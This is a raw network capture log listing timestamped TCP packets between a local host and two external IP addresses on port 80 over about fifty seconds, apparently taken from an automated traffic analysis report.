                                        Nov 21, 2024 20:01:25.153403044 CET5000680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:25.153795958 CET5000680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:25.274482012 CET8050006178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:26.379108906 CET8050005178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:26.379235029 CET5000580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:26.464991093 CET8050006178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:26.465542078 CET5000680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:26.592114925 CET8050006178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:26.592202902 CET5000680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:26.595400095 CET5000780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:26.717624903 CET8050007178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:26.717752934 CET5000780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:26.723089933 CET5000780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:26.842672110 CET8050007178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:28.027894020 CET8050007178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:28.028507948 CET5000780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:28.150613070 CET8050007178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:28.150719881 CET5000780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:28.433046103 CET5001380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:28.552736998 CET8050013178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:28.552892923 CET5001380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:28.553103924 CET5001380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:28.672691107 CET8050013178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:28.880409956 CET5001480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:29.000452995 CET8050014178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:29.000603914 CET5001480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:29.002254009 CET5001480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:29.121726990 CET8050014178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:29.914760113 CET8050013178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:29.915263891 CET5001380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:30.040865898 CET8050013178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:30.040944099 CET5001380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:30.314646006 CET8050014178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:30.315272093 CET5001480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:30.435251951 CET8050014178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:30.435303926 CET5001480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:31.130867004 CET5002080192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:31.251135111 CET8050020178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:31.251274109 CET5002080192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:31.262891054 CET5002080192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:31.384578943 CET8050020178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:31.385461092 CET8050005178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:31.385572910 CET5000580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:32.523741961 CET8050020178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:32.524401903 CET5002080192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:32.644409895 CET8050020178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:32.644464970 CET5002080192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:35.061399937 CET5003180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:35.180998087 CET8050031178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:35.181103945 CET5003180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:35.181283951 CET5003180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:35.300858021 CET8050031178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:36.448208094 CET8050031178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:36.448872089 CET5003180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:36.568777084 CET8050031178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:36.568831921 CET5003180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:37.557533979 CET5003680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:37.677237034 CET8050036178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:37.677478075 CET5003680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:37.684751987 CET5003680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:37.806035042 CET8050036178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:38.943878889 CET8050036178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:38.944479942 CET5003680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:39.064610004 CET8050036178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:39.064717054 CET5003680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:40.910881996 CET5004380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:41.031387091 CET8050043178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:41.031583071 CET5004380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:41.044296980 CET5004380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:41.164021015 CET8050043178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:42.287781954 CET8050043178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:42.338044882 CET5004380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:42.458054066 CET8050043178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:42.458133936 CET5004380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:43.367340088 CET5004780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:43.383970976 CET5004880192.168.2.4178.215.224.252
                                        Nov 21, 2024 20:01:43.487322092 CET8050047178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:43.487442017 CET5004780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:43.497288942 CET5004780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:43.503592968 CET8050048178.215.224.252192.168.2.4
                                        Nov 21, 2024 20:01:43.503725052 CET5004880192.168.2.4178.215.224.252
                                        Nov 21, 2024 20:01:43.513156891 CET5004880192.168.2.4178.215.224.252
                                        Nov 21, 2024 20:01:43.616899967 CET8050047178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:43.632688999 CET8050048178.215.224.252192.168.2.4
                                        Nov 21, 2024 20:01:44.752422094 CET8050047178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:44.756974936 CET5004780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:44.957686901 CET8050047178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:44.957823992 CET5004780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:45.281414032 CET5004980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:45.402317047 CET8050049178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:45.402493000 CET5004980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:45.402611017 CET5004980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:45.522871971 CET8050049178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:46.663364887 CET8050049178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:46.664802074 CET5004980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:46.772907972 CET5005080192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:46.784655094 CET8050049178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:46.784744024 CET5004980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:46.892477989 CET8050050178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:46.892564058 CET5005080192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:46.892848015 CET5005080192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:47.012312889 CET8050050178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:48.167445898 CET8050050178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:48.168092012 CET5005080192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:48.290680885 CET8050050178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:48.290838957 CET5005080192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:48.598839045 CET5005180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:48.718591928 CET8050051178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:48.718722105 CET5005180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:48.728887081 CET5005180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:48.848707914 CET8050051178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:50.022901058 CET8050051178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:50.023504019 CET5005180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:50.122941017 CET5005280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:50.150028944 CET8050051178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:50.150118113 CET5005180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:50.244754076 CET8050052178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:50.245042086 CET5005280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:50.245455027 CET5005280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:50.364886999 CET8050052178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:51.662812948 CET8050052178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:51.664313078 CET5005280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:51.787427902 CET8050052178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:51.787554026 CET5005280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:52.193583012 CET5005380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:52.362777948 CET8050053178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:52.362940073 CET5005380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:52.363153934 CET5005380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:52.482995033 CET8050053178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:53.664088964 CET8050053178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:53.664782047 CET5005380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:53.747097015 CET5005480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:53.838063955 CET8050053178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:53.838124990 CET5005380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:53.867139101 CET8050054178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:53.867211103 CET5005480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:53.867381096 CET5005480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:54.047996998 CET8050054178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:55.249310017 CET8050054178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:55.250689983 CET5005480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:55.370999098 CET8050054178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:55.371175051 CET5005480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:55.743681908 CET5005580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:55.863225937 CET8050055178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:55.863440990 CET5005580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:55.863719940 CET5005580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:55.984750032 CET8050055178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:57.253498077 CET8050055178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:57.254122019 CET5005580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:57.364451885 CET5005680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:57.445286036 CET8050055178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:57.445391893 CET5005580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:57.484195948 CET8050056178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:57.484302998 CET5005680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:57.484677076 CET5005680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:57.668884039 CET8050056178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:58.848591089 CET8050056178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:58.850068092 CET5005680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:58.969938040 CET8050056178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:58.970066071 CET5005680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:59.357630968 CET5005780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:59.477232933 CET8050057178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:59.477339983 CET5005780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:59.477477074 CET5005780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:59.620372057 CET8050057178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:00.862489939 CET8050057178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:00.863786936 CET5005780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:00.972914934 CET5005880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:00.983761072 CET8050057178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:00.983833075 CET5005780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:01.092797041 CET8050058178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:01.092976093 CET5005880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:01.096887112 CET5005880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:01.216779947 CET8050058178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:02.421952963 CET8050058178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:02.423301935 CET5005880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:02.603518963 CET8050058178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:02.603630066 CET5005880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:03.007169008 CET5005980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:03.126734972 CET8050059178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:03.127033949 CET5005980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:03.138044119 CET5005980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:03.257735014 CET8050059178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:04.439176083 CET8050059178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:04.439829111 CET5005980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:04.538918972 CET5006080192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:04.559847116 CET8050059178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:04.559967041 CET5005980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:04.717078924 CET8050060178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:04.717149973 CET5006080192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:04.717284918 CET5006080192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:04.927323103 CET8050060178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:05.465611935 CET8050048178.215.224.252192.168.2.4
                                        Nov 21, 2024 20:02:05.465730906 CET5004880192.168.2.4178.215.224.252
                                        Nov 21, 2024 20:02:05.465945005 CET5004880192.168.2.4178.215.224.252
                                        Nov 21, 2024 20:02:05.586194038 CET8050048178.215.224.252192.168.2.4
                                        Nov 21, 2024 20:02:06.170751095 CET8050060178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:06.171997070 CET5006080192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:06.293908119 CET8050060178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:06.293998003 CET5006080192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:06.844487906 CET5006180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:06.967470884 CET8050061178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:06.967603922 CET5006180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:06.967983007 CET5006180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:07.089462042 CET8050061178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:08.285877943 CET8050061178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:08.286626101 CET5006180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:08.422806025 CET8050061178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:08.422920942 CET5006180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:09.126811981 CET5006280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:09.246632099 CET8050062178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:09.246720076 CET5006280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:09.247013092 CET5006280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:09.367508888 CET8050062178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:10.553332090 CET8050062178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:10.557342052 CET5006280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:10.596223116 CET5006380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:10.677403927 CET8050062178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:10.678308010 CET5006280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:10.715753078 CET8050063178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:10.718286037 CET5006380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:10.718452930 CET5006380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:10.838536978 CET8050063178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:11.854674101 CET5006480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:11.975013018 CET8050064178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:11.975172997 CET5006480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:11.975272894 CET5006480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:12.026057005 CET8050063178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:12.026591063 CET5006380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:12.130805969 CET5006580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:12.225931883 CET8050064178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:12.226691961 CET8050063178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:12.226787090 CET5006380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:12.307054043 CET8050065178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:12.307199955 CET5006580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:12.307480097 CET5006580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:12.428430080 CET8050065178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:13.378485918 CET8050064178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:13.381175995 CET5006480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:13.486251116 CET5006680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:13.501010895 CET8050064178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:13.501666069 CET5006480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:13.580341101 CET8050065178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:13.583015919 CET5006580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:13.606020927 CET8050066178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:13.606136084 CET5006680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:13.606559038 CET5006680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:13.691518068 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:13.727739096 CET8050065178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:13.728214979 CET8050066178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:13.728298903 CET5006580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:13.812156916 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:13.812638044 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:13.812805891 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:13.932372093 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:14.955813885 CET8050066178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:14.956515074 CET5006680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:15.076445103 CET8050066178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.076514959 CET5006680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:15.175194025 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.175209999 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.175228119 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.175251961 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.175263882 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.175275087 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.175340891 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:15.175412893 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.175426006 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.175523996 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:15.175523996 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:15.175578117 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.175604105 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.175647974 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:15.294857979 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.294918060 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.294965982 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:15.299170971 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.299184084 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.299262047 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:15.367024899 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.367038965 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.367083073 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:15.369518042 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.369635105 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.369685888 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:15.377866030 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.377935886 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.377981901 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:15.386426926 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.386456966 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.386523962 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:15.394665956 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.394718885 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.394779921 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:15.403048992 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.403120995 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.403181076 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:15.411509037 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.411550999 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.411618948 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:15.419868946 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.419909954 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.419958115 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:15.428241968 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.428359032 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.428406954 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:15.436723948 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.436765909 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.436829090 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:15.444561005 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.444600105 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.444642067 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:15.452469110 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.452620029 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.452666044 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:15.487085104 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.528449059 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:15.559283018 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.559356928 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.559403896 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:15.563064098 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.564534903 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.564584970 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:15.564599037 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.572362900 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.572433949 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:15.572510004 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.580430984 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.580498934 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.580523968 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:15.585248947 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.585263968 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.585335970 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:15.589387894 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.589472055 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:15.589534044 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.593827963 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.593892097 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.593902111 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:15.598351955 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.598407984 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:15.598543882 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.602829933 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.602889061 CET5006780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:15.602921963 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.607345104 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.607358932 CET8050067178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:15.607425928 CET5006780192.168.2.4178.215.224.74
